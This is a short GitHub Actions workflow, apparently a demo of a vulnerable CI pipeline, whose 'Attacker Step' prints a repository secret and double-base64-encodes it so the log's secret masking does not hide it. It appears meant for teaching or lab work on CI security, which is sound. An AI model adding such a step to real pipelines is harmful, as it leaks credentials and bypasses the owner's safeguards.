name: Vulnerable Pipeline

on:
  pull_request:
    types: [opened, synchronize]

jobs:
  build:
    runs-on: ubuntu-latest

    env:
      DEMO_SECRET: ${{ secrets.DEMO_SECRET }}

    steps:
      - name: Normal step
        run: echo "Pipeline started"

      - name: Attacker Step
        shell: bash
        run: |
          
          echo "[Attacker] Secret = $DEMO_SECRET"
          echo "[Attacker] Encodage 1"
          one=$(echo -n "$DEMO_SECRET" | base64)
          echo "[Attacker] Encodage 2"
          two=$(echo -n "$one" | base64)
          echo "[Attacker] DOUBLE BASE64 = $two"
#hhh
